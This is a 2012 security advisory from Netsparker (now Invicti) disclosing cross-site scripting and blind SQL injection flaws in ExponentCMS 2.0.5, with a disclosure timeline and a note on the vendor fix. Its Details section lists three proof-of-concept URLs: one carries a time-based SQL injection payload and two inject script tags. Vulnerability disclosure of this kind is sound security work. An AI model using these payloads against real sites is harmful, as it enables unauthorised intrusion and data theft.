Information
--------------------
Advisory by Netsparker (now Invicti)
Name: XSS and Blind SQL Injection Vulnerabilities in ExponentCMS
Software: ExponentCMS 2.0.5 and possibly below.
Vendor Homepage: http://www.exponentcms.org
Vulnerability Type: Cross-Site Scripting and SQL Injection
Severity: Critical
Researcher: Onur Yılmaz
Advisory Reference: NS-12-006

Description
--------------------
Exponent is a website content management system (or CMS) that allows site owners to easily create and manage dynamic websites without necessarily directly coding web pages, or managing site navigation.

Details
--------------------
Exponent CMS is affected by XSS and SQL Injection vulnerabilities in version 2.0.5.

Example PoC urls are as follows : 
http://example.com/index.php?section=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)
http://example.com/index.php?action=showall_by_tags&tag=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E&controller=news&src=@random4e5433b85bb1f
http://example.com/index.php?controller=expTag&action=show&title=changes&src=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E

You can read the full article about Cross-Site Scripting and SQL Injection vulnerabilities from here :

Solution
--------------------
The vendor fixed this vulnerability in the new version. Please see the references.

Advisory Timeline
--------------------
12/03/2012 - First contact: Sent the vulnerability details
20/03/2012 - Vulnerability Fixed in the latest version
23/04/2012 - Vulnerability Released

Credits
--------------------
It has been discovered on testing of Netsparker Web Application Security Scanner.

References
--------------------

About Invicti
--------------------

Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.